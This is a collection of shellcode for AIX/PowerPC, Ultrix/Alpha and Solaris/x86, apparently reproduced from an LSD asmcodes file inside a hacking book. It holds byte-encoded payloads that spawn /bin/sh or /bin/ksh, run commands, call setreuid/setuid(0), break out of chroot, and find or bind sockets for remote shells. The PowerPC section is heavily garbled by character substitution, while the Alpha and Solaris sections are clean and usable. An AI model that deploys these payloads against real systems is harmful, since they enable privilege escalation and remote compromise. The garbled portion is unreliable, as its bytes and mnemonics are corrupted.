KOxb"OxceOx0#OxffK /- addi -0x,,Jr,C,Jr,C -/
KOxDDOx0eOxBfOxadK /- combf, Jr,C,Jr0,QfindsckcodeN,!$ -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
KOx(,Ox(,Ox,!OxBCK
KOxb"OxMMOx0(OxBfK /- addi -0xe,,Jr,!,Jr!" -/
KOxC#Ox!fOx0!Ox!0K /- ldh 0x,,0(Jr!"),Jr," -/
KOxC"OxM0OxBfOxdfK /- ldh -0x,,(Jr,!),Jr,( -/
KOxD!Ox0fOx!0Ox,0K /- comb, Jr,",Jr,(,QfindsckcodeNDD$ -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
KOxDaOx0fOxBfOx(dK /- combf, Jr,",Jr,(,QfindsckcodeN,!$ -/
KOxb"OxceOx0#OxffK /- addi -0x,,Jr,C,Jr,C -/
KOxbCOx0fOxC0Ox0CK /- addi,Q 0x!,Jr0,Jr," -/
KOx0DOx0eOx0(Ox,aK /- add Jr,C,Jr0,Jr!( -/
KOx0DOx0fOx0(Ox,MK /- add Jr,",Jr0,Jr!" -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOxbCOx,(Ox#0OxbCK /- addi,$ 0x"a,Jr0,Jr!! -/
KOxDDOx0fOxBfOxcdK /- combf, Jr,",Jr0,QfindsckcodeNM!$ -/
KOxb"OxefOx0#OxffK /- addi -0x,,Jr,",Jr," -/
;
char bindsckcode./ /- B#-C b>tes -/
KOxbCOx,#OxC0Ox0CK /- addi,Q 0x!,Jr0,Jr!B -/
KOxeMOxM#OxC0Ox0!K /- blr,n Jr!B,Jr,! -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOx0aOxf#Ox0!OxM#K /- xor Jr!B,Jr!B,Jr!B -/
KOxeDOxC0Oxc0Ox0!K /- b?,n 0(Jr*) -/
KOx(,Ox0!Ox!BOxC"K
KOxbCOx,aOxC0Ox0CK /- addi,Q 0x!,Jr0,Jr!( -/
KOxbCOx,MOxC0Ox0!K /- addi,Q 0x,,Jr0,Jr!" -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
KOxeDOx"fOx,fOxadK /- bl QbindsckcodeNC$,Jr* -/
KOxbCOx,(Ox#!OxCCK /- addi,$ 0x,!!,Jr0,Jr!! -/
KOx0DOx,cOx0(Ox0dK /- add Jret0,Jr0,Jr,B -/
KOxb"OxDcOxC0Ox,0K /- addi,Q 0xD,Jr,!,Jr,! -/
KOxbCOx,DOxC0Ox!0K /- addi,Q 0x,0,Jr0,Jr!C -/
KOx0DOx0dOx0(Ox,aK /- add Jr,B,Jr0,Jr!( -/
KOx0dOxD0Ox,!OxDaK /- stE Jr0,0x"(Jr,!) -/
KOxb"OxMMOxC0Ox0!K /- addi,Q 0x,,Jr,!,Jr!" -/
KOxeDOx"fOx,fOx(dK /- bl QbindsckcodeNC$,Jr* -/
KOxbCOx,(Ox#!Ox!DK /- addi,$ 0x,,C,Jr0,Jr!! -/
KOx0DOx0dOx0(Ox,aK /- add Jr,B,Jr0,Jr!( -/
KOxbCOx,MOxC0Ox0!K /- addi,Q 0x,,Jr0,Jr!" -/
KOxeDOx"fOx,fOxCdK /- bl QbindsckcodeNC$,Jr* -/
KOxbCOx,(Ox#!OxB!K /- addi,$ 0x,,M,Jr0,Jr!! -/
KOx0DOx0dOx0(Ox,aK /- add Jr,B,Jr0,Jr!( -/
KOx0bOxBMOx0!OxMMK /- xor Jr!",Jr!",Jr!" -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
KOxeDOx"fOx,fOx!"K /- bl QbindsckcodeNC$,Jr* -/
KOxbCOx,(Ox#!Ox!(K /- addi,$ 0x,,B,Jr0,Jr!! -/
KOxbCOx0eOxC0Ox0CK /- addi,Q 0x!,Jr0,Jr,C -/
KOx0DOx,cOx0(Ox0cK /- add Jret0,Jr0,Jr,! -/
KOx0DOx0cOx0(Ox,aK /- add Jr,!,Jr0,Jr!( -/
KOx0DOx0eOx0(Ox,MK /- add Jr,C,Jr0,Jr!" -/
KOxeDOx"fOx,eOxf"K /- bl QbindsckcodeNC$,Jr* -/
KOxbCOx,(Ox#0OxbCK /- addi,$ 0x"a,Jr0,Jr!! -/
KOxDDOx0eOxBfOxd"K /- combf, Jr,C,Jr0,QbindsckcodeN,!C$ -/
KOxb"OxceOx0#OxffK /- addi -0x,,Jr,C,Jr,C -/
;
char %um*./
KOxe0OxC0Ox00Ox00K /- be 0x0(Jsr0,Jr*) -/
KOxB#OxdcOx00Ox00K /- co*> Js*,Jret0 -/
;
Hdefine 2I3F689@7:5726 "D
Hdefine AI3F689@7:5726 !(
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
Hendif
AIX/POWER/PowerPC codes, file: powerpc-aix
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for aix C., C.! C.B *oEer/*oEer*c H-/
/-
s>scall Jr! Jr! Jr! JrB,JrC,Jr"
----------- ---- ---- ---- -----------------------------------------------------
exec?e x00B x00! x00C -$*athK/bin/shK,-$.-$a0*ath,0/,0
exec?e x00B x00! x00C -$*athK/bin/shK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/,0
seteuid x0(D x0#, x0D! euid0
mkdir x0#f x0De x0a0 -$*athKt..K,mode (each ?alue is ?alid)
chroot x0(f x0#D x0DM -$*ath)Kt..K,K.K0
chdir x0(d x0#( x0D# -$*athK..K
get*eername x0C, x0C( x0"B sfd,-$sadr./,-$.len0x!c/
socket x0"# x0"b x0(M 12'I345!,6789'65:41;,,*rot0
bind x0"( x0"a x0(D sfd,-$sadr.0x!c,0x0!,hi,lo,0,0,0,0/,len0x,0
listen x0"" x0"M x0(# sfd,backlog"
acce*t x0"B x0"D x0(" sfd,0,0
close x0"e x0(! x0#, fd)0,,,!0
kfcntl x0d( x0e# x0fc sfd,2'F<@2F0,fd)0,,,!0
?C., ?C.! ?C.B
-/
Hif defined(@7V4:@8) ++ defined(1IL)
char 'shellcode./ /- ,!-CND b>tes -/
KOx#cOxa"Ox!aOx#MK /- xor. r",r",r" -/
KOxC0OxD!OxffOxfdK /- bnel Qshellcode$ -/
KOx#fOxeDOx0!Oxa(K /- mflr rB, -/
KOxBbOxffOx0,Ox!0K /- cal rB,,0x,!0(rB,) -/
KOxBDOx#fOxffOx0DK /- cal rB,-!CD(rB,) -/
KOxBDOxMfOxffOx,0K /- cal rC,-!C0(rB,) -/
KOxM0Ox#fOxffOx,0K /- st rB,-!C0(rB,) -/
KOxM0OxbfOxffOx,CK /- st r",-!B((rB,) -/
KOxDDOx"fOxffOx0fK /- lb& r!,-!C,(rB,) -/
KOxMDOxbfOxffOx0fK /- stb r",-!C,(rB,) -/
KOxCcOxc(OxBBOxC!K /- crorc cr(,cr(,cr( -/
KOxCCOxffOxffOx0!K /- s?ca -/
K/bin/shK
Hifdef SC,
KOx0BK
Hendif
Hifdef SC!
KOx0!K
Hendif
Hifdef SCB
KOx0CK
Hendif
;
char 'setreuidshellcode./ /- ,M-CN# b>tes -/
KOx#eOxMCOxa!Ox#MK /- xor. r!0,r!0,r!0 -/
KOxC0OxD!OxffOxfdK /- bnel (setreuidcode) -/
KOx#eOxaDOx0!Oxa(K /- mflr r!, -/
KOxBaOxb"Ox0,OxC0K /- cal r!,,0x,C0(r!,) -/
KOxDDOx""OxfeOxe0K /- lb& r!,-!DD(r!,) -/
KOx#eOxDBOxaBOx#DK /- mr rB,r!0 -/
KOxBaOxd"OxfeOxeCK /- cal r!!,-!DC(r!,) -/
KOx#eOxcDOx0BOxa(K /- mtlr r!! -/
KOxCcOxc(OxBBOxC!K /- crorc cr(,cr(,cr( -/
KOxCCOxffOxffOx0!K /- s?ca -/
Hifdef SC,
KOx(DOx0BOxffOxffK
Hendif
Hifdef SC!
KOx#,Ox0!OxffOxffK
Hendif
Hifdef SCB
KOxD!Ox0COxffOxffK
Hendif
KOxBDOx#"OxffOx0CK /- cal rB,-!"!(r!,) -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxBDOxM"OxffOx0cK /- cal rC,-!CC(r!,) -/
KOx#eOxD"OxaBOx#DK /- mr r",r!0 -/
KOxM0Ox#"OxffOx0cK /- st rB,-!CC(r!,) -/
KOxM!OxM"OxffOx,0K /- st r!0,-!C0(r!,) -/
KOxDDOx""OxfeOxe,K /- lb& r!,-!D#(r!,) -/
KOxMaOxM"OxffOx0bK /- stb r!0,-!C"(r!,) -/
KOxCbOxffOxffOxdDK /- bl (setreuidcodeNB!) -/
K/bin/shK
;
char s>scallcode./ /- ,C-C b>tes -/
KOx#eOxMCOxa!Ox#MK /- xor. r!0,r!0,r!0 -/
KOxC0OxD!OxffOxfdK /- bnel Qs>scallcode$ -/
KOx#eOxaDOx0!Oxa(K /- mflr r!, -/
KOxBaOxc0Ox0,OxffK /- lil r!!,0x,ff -/
KOxBaOxf(OxfeOx!dK /- cal r!B,-C(#(r!!) -/
KOx#eOxb"OxbaOx,CK /- cax r!,,r!,,r!B -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!0K /- bctr -/
Hifdef SC,
KOx0BOx(DOxC,Ox"eK
KOx(dOx#fOx(fOxd(K
KOx"#Ox"(Ox""Ox"BK
Hendif
Hifdef SC!
KOx0!Ox#,OxC(Ox(!K
KOx#(OxDeOx#DOxe#K
KOx"bOx"aOx"MOx"DK
Hendif
Hifdef SCB
KOx0COxD!Ox"BOx#,K
KOxD#Oxa0OxDMOxfcK
KOx(MOx(DOx(#Ox("K
Hendif
KOxCcOxc(OxBBOxC!K /- crorc cr(,cr(,cr( -/
KOxCCOxffOxffOx0!K /- s?ca 0x0 -/
KOxBaOxb"OxffOxfDK /- cal r!,,-D(r!,) -/
;
char shellcode./ /- ,!-CN# b>tes -/
KOx#cOxa"Ox!aOx#MK /- xor. r",r",r" -/
KOxC0OxD!OxffOxfdK /- bnel Qshellcode$ -/
KOx#fOxeDOx0!Oxa(K /- mflr rB, -/
KOxBbOxffOx0,Ox!0K /- cal rB,,0x,!0(rB,) -/
KOxBDOx#fOxffOx0DK /- cal rB,-!CD(rB,) -/
KOxBDOxMfOxffOx,0K /- cal rC,-!C0(rB,) -/
KOxM0Ox#fOxffOx,0K /- st rB,-!C0(rB,) -/
KOxM0OxbfOxffOx,CK /- st r",-!B((rB,) -/
KOxDDOx""OxffOxfCK /- lb& r!,-,!(r!,) -/
KOxMDOxbfOxffOx0fK /- stb r",-!C,(rB,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!0K /- bctr -/
K/bin/shK
;
char cmdshellcode./ /- ,#-CN,!Ncmdlen b>tes -/
KOx#cOxa"Ox!aOx#MK /- xor. r",r",r" -/
KOxC0OxD!OxffOxfdK /- bnel Qcmdshellcode$ -/
KOx#fOxeDOx0!Oxa(K /- mflr rB, -/
KOxBbOxffOx0,Ox!cK /- cal rB,,0x,!c(rB,) -/
KOxBDOx#fOxffOx,0K /- cal rB,-!C0(rB,) -/
KOxBDOxMfOxfeOxcDK /- cal rC,-B,!(rB,) -/
KOxBDOxdfOxffOx,DK /- cal r(,-!B!(rB,) -/
KOxBDOxffOxffOx,cK /- cal r#,-!!D(rB,) -/
KOxM0Ox#fOxfeOxcDK /- st rB,-B,!(rB,) -/
KOxM0OxdfOxfeOxccK /- st r(,-B0D(rB,) -/
KOxM0OxffOxfeOxd0K /- st r#,-B0C(rB,) -/
KOxM0OxbfOxfeOxdCK /- st r",-B00(rB,) -/
KOxMDOxbfOxffOx,#K /- stb r",-!BB(rB,) -/
KOxMDOxbfOxffOx,aK /- stb r",-!B0(rB,) -/
KOxDDOx""OxffOxfCK /- lb& r!,-,!(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!0K /- bctr -/
K/bin/sh -c K
/- command -/
;
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
char setreuidcode./ /- C-C b>tes -/
KOxDDOx""OxffOxf"K /- lb& r!,-,,(r!,) -/
KOx#eOxDBOxaBOx#DK /- mr rB,r!0 -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
;
char chrootcode./ /- !B-C b>tes -/
KOx!cOx#COx!eOx!eK /- cm*i cr0,r!0,0x!e!e -/
KOxC,OxD!OxffOxfdK /- beRl Qchrootcode$ -/
KOx#fOx0DOx0!Oxa(K /- mflr r!C -/
KOxM!OxMDOxffOxfcK /- st r!0,-C(r!C) -/
KOxBDOx#DOxffOxfMK /- cal rB,-#(r!C) -/
KOxDDOx""OxffOxfMK /- lb& r!,-#(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxBDOx#DOxffOxfMK /- cal rB,-#(r!C) -/
KOxDDOx""OxffOxfaK /- lb& r!,-((r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxBbOx!0Ox0,Ox0,K /- lil r!",0x,0, -/
KOxBDOx#DOxffOxfaK /- cal rB,-((r!C) -/
KOxDDOx""OxffOxfDK /- lb& r!,-D(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxB#OxBMOxffOxffK /- ai. r!",r!",-, -/
KOxC0OxD!OxffOxecK /- bne QchrootcodeN"!$ -/
KOxBDOx#DOxffOxfbK /- cal rB,-"(r!C) -/
KOxDDOx""OxffOxfaK /- lb& r!,-((r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
;
char findsckcode./ /- BD-C b>tes -/
KOx!cOx#COx,!OxBCK /- cm*i cr0,r!0,0x,!BC -/
KOxC,OxD!OxffOxfdK /- beRl Qfindsckcode$ -/
KOx#fOx0DOx0!Oxa(K /- mflr r!C -/
KOxBbOxB(OxfeOx!dK /- cal r!",-C(#(r!!) -/
KOxBbOxC0Ox0,Ox0,K /- lil r!(,0x,( -/
KOx#fOx#DOxcaOx,CK /- cax r!#,r!C,r!" -/
KOx#fOx(MOx0BOxa(K /- mtctr r!# -/
KOxCeOxD0Ox0COx!0K /- bctr -/
KOxaBOx#DOxffOxfeK /- lh& r!#,-!(r!C) -/
KOxaBOxMDOxffOxfaK /- lh& r!D,-((r!C) -/
KOx#cOx,bOxe0OxC0K /- cm*l cr0,r!#,r!D -/
KOxBbOxB(OxfeOx"MK /- cal r!",-C!B(r!!) -/
KOxC,OxD!OxffOxeCK /- beR QfindsckcodeN!0$ -/
KOx#fOxCBOxdBOx#DK /- mr rB,r!( -/
KOxBDOxMDOxffOxfcK /- cal rC,-C(r!C) -/
KOxBDOxbDOxffOxfCK /- cal r",-,!(r!C) -/
KOxMBOxBDOxffOxfCK /- st r!",-,!(r!C) -/
KOxDDOx""OxffOxf(K /- lb& r!,-,0(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxB#Ox"aOxffOxffK /- ai. r!(,r!(,-, -/
KOx!dOx0BOxffOxffK /- cm*i cr!,rB,-, -/
KOxC0OxDaOxffOxcDK /- bne cr!,QfindsckcodeNB!$ -/
KOxC0OxD!OxffOxdDK /- bne QfindsckcodeNCD$ -/
KOxBbOxB(OxfeOx0BK /- cal r!",-"0M(r!!) -/
KOxBbOx#(OxfeOx0!K /- cal r!#,-",0(r!!) -/
KOx#fOx!BOxcbOx#DK /- mr rB,r!" -/
KOxDDOx""OxffOxf#K /- lb& r!,-M(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#cOx#aOxdaOx,CK /- cax rB,r!(,r!# -/
KOx#eOxDCOxaBOx#DK /- mr rC,r!0 -/
KOx#fOx!"OxcbOx#DK /- mr r",r!" -/
KOxDDOx""OxffOxfbK /- lb& r!,-"(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxB#OxBMOxffOxffK /- ai. r!",r!",-, -/
KOxC0OxD0OxffOxdCK /- bge QfindsckcodeN,00$ -/
;
char bindsckcode./ /- C!-C b>tes -/
KOx!cOx#COx,!OxBCK /- cm*i cr0,r!0,0x,!BC -/
KOxC,OxD!OxffOxfdK /- beRl Qbindsckcode$ -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOx#fOx0DOx0!Oxa(K /- mflr r!C -/
KOxM!OxMDOxffOxfcK /- st r!0,-C(r!C) -/
KOxBDOx#(OxfeOx0BK /- cal rB,-"0M(r!!) -/
KOxBDOxM(OxfeOx0!K /- cal rC,-",0(r!!) -/
KOxMDOx#DOxffOxfMK /- stb rB,-#(r!C) -/
KOx#eOxD"OxaBOx#DK /- mr r",r!0 -/
KOxDDOx""OxffOxfcK /- lb& r!,-C(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#cOx#MOx,bOx#DK /- mr r!",rB -/
KOxBDOxMDOxffOxfDK /- cal rC,-D(r!C) -/
KOxBDOxb(OxfeOx,,K /- cal r",-CM"(r!!) -/
KOxDDOx""OxffOxfdK /- lb& r!,-B(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#fOx!BOxcbOx#DK /- mr rB,r!" -/
KOxBDOxM(OxfeOx0(K /- cal rC,-"0((r!!) -/
KOxDDOx""OxffOxfeK /- lb& r!,-!(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#fOx!BOxcbOx#DK /- mr rB,r!" -/
KOx#eOxDCOxaBOx#DK /- mr rC,r!0 -/
KOx#eOxD"OxaBOx#DK /- mr r",r!0 -/
KOxDDOx""OxffOxffK /- lb& r!,-,(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#cOx#MOx,bOx#DK /- mr r!",rB -/
KOxBbOx"(OxfeOx0BK /- cal r!(,-"0M(r!!) -/
KOx#fOxCBOxdBOx#DK /- mr rB,r!( -/
KOxDDOx""OxffOxf#K /- lb& r!,-M(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#fOx!BOxcbOx#DK /- mr rB,r!" -/
KOx#eOxDCOxaBOx#DK /- mr rC,r!0 -/
KOx#fOxC"OxdBOx#DK /- mr r",r!( -/
KOxDDOx""OxffOxfbK /- lb& r!,-"(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxB#Ox"aOxffOxffK /- ai. r!(,r!(,-, -/
KOxC0OxD0OxffOxdCK /- bge QbindsckcodeN,!0$ -/
;
Hdefine 2I3F689@7:5726 !
Hdefine AI3F689@7:5726 !
Hendif
Ultrix/ALPHA codes, file: alpha-ultrix
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for ultrix ".0 al*ha H-/
/-
s>scall J?0 Ja0,Ja,,Ja!,JaB
----------- ---- ---------------------------------------------------------------
exec? x00b -$*athK/bin/shK,-$.-$a0*ath,0/
exec? x00b -$*athK/bin/shK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/
setreuid x0#e ruid,euid0
-/
Hif defined(1=@U1) ++ defined(<=5:IL)
char shellcode./ /- ,D-CN# b>tes -/
KOxfbOx(bOx#fOx!(K /- ldah aB,!#(CB(&ero) -/
KOx0,OxD0Ox#BOx!!K /- lda aB,-B!#(#(aB) -/
KOxC0Ox0,Ox#eOxb!K /- stl aB,B!0(s*) -/
KOxC0Ox0,OxMeOx!!K /- lda aC,B!0(s*) -/
KOx,0OxC0Ox"COx(bK /- %sr ra,(aC),0x,0 -/
KOxD0OxD!Ox"aOx!BK /- lda ra,-B!,!D(ra) -/
KOx,!Ox0COxffOxC#K /- bis &ero,&ero, a! -/
KOxbbOx#dOxfaOxBbK /- stb &ero,B!,D#(ra) -/
KOxbCOx#dOx,aOx!!K /- lda a0,B!,D0(ra) -/
KOxcCOx#dOx,aOxb(K /- stR a0,B!,M((ra) -/
KOxcCOx#dOxBaOx!!K /- lda a,,B!,M((ra) -/
KOxccOx#dOxfaOxb#K /- stR &ero,B!!0C(ra) -/
KOx,BOx#COxf0OxC#K /- bis &ero,0xDB,aB -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxD0Ox!0Ox#eOxb!K /- stl aB,DB!0(s*) -/
KOxD0Ox!0OxMeOx!!K /- lda aC,DB!0(s*) -/
KOxbbOx0!OxbfOx!!K /- lda a",(MM(&ero) -/
KOx"0OxfdOx,"Ox!0K /- lda ?0,-(C0(a") -/
KOx,0OxC0Ox"COx(bK /- %sr ra,(aC),0x,0 -/
K/bin/shK
;
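/* Ultrix/Alpha: execv("/bin/sh","-c",cmd).  The command string is expected
 * to be appended directly after the trailing "/bin/sh -c " (see the
 * "cmdlen" usage in asmcodes.c); the string in this block is 11 bytes. */
char cmdshellcode[]=       /* 22*4+11+cmdlen bytes           */
    "\xfb\x6b\x7f\x26"     /* ldah    a3,27643(zero)         */
    "\x01\x80\x73\x22"     /* lda     a3,-32767(a3)          */
    "\x40\x01\x7e\xb2"     /* stl     a3,320(sp)             */
    "\x40\x01\x9e\x22"     /* lda     a4,320(sp)             */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10           */
    "\x80\x82\x5a\x23"     /* lda     ra,-32128(ra)          */
    "\xcb\x7d\xfa\x3b"     /* stb     zero,32203(ra)         */
    "\xce\x7d\xfa\x3b"     /* stb     zero,32206(ra)         */
    "\xc4\x7d\x1a\x22"     /* lda     a0,32196(ra)           */
    "\x5c\x7d\x1a\xb6"     /* stq     a0,32092(ra)           */
    "\xcc\x7d\x7a\x22"     /* lda     a3,32204(ra)           */
    "\x64\x7d\x7a\xb6"     /* stq     a3,32100(ra)           */
    "\xd0\x7d\x7a\x22"     /* lda     a3,32208(ra)           */
    "\x6c\x7d\x7a\xb6"     /* stq     a3,32108(ra)           */
    "\x74\x7d\xfa\xb7"     /* stq     zero,32116(ra)         */
    "\x5c\x7d\x3a\x22"     /* lda     a1,32092(ra)           */
    "\x13\x74\xf0\x47"     /* bis     zero,0x83,a3           */
    "\x80\x20\x7e\xb2"     /* stl     a3,8320(sp)            */
    "\x80\x20\x9e\x22"     /* lda     a4,8320(sp)            */
    "\xbb\x02\xbf\x22"     /* lda     a5,699(zero)           */
    "\x50\xfd\x15\x20"     /* lda     v0,-688(a5)  (= 0x00b) */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10           */
    "/bin/sh -c "
;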
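/* Ultrix/Alpha: setreuid(-1,0) (syscall 0x07e = 699-573). */
char setreuidcode[]=       /* 11*4 bytes                     */
    "\xff\xff\x1f\x22"     /* lda     a0,-1(zero)            */
    "\x11\x04\xff\x47"     /* bis     zero,zero,a1           */
    "\xbb\x02\xbf\x22"     /* lda     a5,699(zero)           */
    "\xc3\xfd\x15\x20"     /* lda     v0,-573(a5)            */
    "\x13\x74\xf0\x47"     /* bis     zero,0x83,a3           */
    "\x80\x02\x7e\xb2"     /* stl     a3,640(sp)             */
    "\x80\x02\x9e\x22"     /* lda     a4,640(sp)             */
    "\xfb\x6b\x7f\x26"     /* ldah    a3,27643(zero)         */
    "\x01\x80\x73\x22"     /* lda     a3,-32767(a3)          */
    "\x84\x02\x7e\xb2"     /* stl     a3,644(sp)             */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10           */
;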
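/* Ultrix/Alpha stack-pointer retrieval: returns sp in v0.
 * NOTE: the first word contains a 0x00 byte, so this block cannot be
 * delivered through a NUL-terminated string copy. */
char jump[]=
    "\x00\x40\xde\x47"     /* bis     sp,sp,v0               */
    "\x01\x80\xfa\x6b"     /* ret     zero,(ra),1            */
;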
#endif
Solaris/x86 codes, file: x86-solaris
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## asmcodes for solaris 2.6 2.7 2.8 x86 #*/
/*
syscall     %eax stack
----------- ---- ---------------------------------------------------------------
exec        0x00b ret,->path="/bin/ksh",->[->a0=path,0]
exec        0x00b ret,->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
setuid      0x017 ret,uid=0
mkdir       0x050 ret,->path="b..",mode (each value is valid)
chroot      0x03d ret,->path={"b..","."}
chdir       0x00c ret,->path=".."
ioctl       0x036 ret,sfd,TI_GETPEERNAME=0x5491,->[mlen=0x91,len=0x91,->sadr[]]
so_socket   0x0e6 ret,AF_INET=2,SOCK_STREAM=2,prot=0,devpath=0,SOV_DEFAULT=1
bind        0x0e8 ret,sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],len=0x10,SOV_SOCKSTREAM=2
listen      0x0e9 ret,sfd,backlog=5,vers (not required in this syscall)
accept      0x0ea ret,sfd,0,0,vers (not required in this syscall)
fcntl       0x03e ret,sfd,F_DUP2FD=0x09,fd={0,1,2}
*/
#if defined(X86) && defined(SOLARIS)
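/* Solaris/x86: self-contained exec of "/bin/ksh".  Unlike shellcode below it
 * does not rely on %esi pointing at syscallcode; it appears to write the
 * 0x9a/0x07 gate bytes in place itself (the stosl sequence). */
char _shellcode[]=         /* 33+8 bytes                     */
    "\xeb\x1a"             /* jmp     <shellcode+28>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\x83\xef\x3b"         /* subl    $0x3b,%edi             */
    "\xb0\x9a"             /* movb    $0x9a,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xb0\x07"             /* movb    $0x07,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xe8\xe1\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;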
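/* Solaris/x86 syscall stub: builds the far call gate (9a ff ff ff ff 07 ff,
 * i.e. lcall $0x7,$0) and leaves its address in %esi so the other blocks can
 * enter the kernel with `call *%esi`. */
char syscallcode[]=        /* 26 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xeb\x09"             /* jmp     <syscallcode+13>       */
    "\x5f"                 /* popl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\x47"                 /* incl    %edi                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xaa"                 /* stosb   %al,%es:(%edi)         */
    "\x5e"                 /* popl    %esi                   */
    "\xeb\x0d"             /* jmp     <syscallcode+26>       */
    "\xe8\xf2\xff\xff\xff" /* call    <syscallcode+4>        */
    "\x9a\xff\xff\xff\xff"
    "\x07\xff"
    "\xc3"                 /* ret                            */
;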
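/* Solaris/x86: exec("/bin/ksh") through the gate left in %esi by
 * syscallcode (`call *%esi`). */
char shellcode[]=          /* 25+8 bytes                     */
    "\xeb\x12"             /* jmp     <shellcode+20>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xe9\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;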
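/* Solaris/x86: exec("/bin/ksh","-c",cmd) via `call *%esi`; the command is
 * appended after the trailing "/bin/ksh -c " (12 bytes).  The leal
 * displacement byte 0xac is -0x54. */
char cmdshellcode[]=       /* 36+12+cmdlen bytes             */
    "\xeb\x1d"             /* jmp     <cmdshellcode+31>      */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\xac"         /* leal    -0x54(%eax),%edi       */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\x88\x50\x08"         /* movb    %dl,0x8(%eax)          */
    "\x88\x50\x0b"         /* movb    %dl,0xb(%eax)          */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
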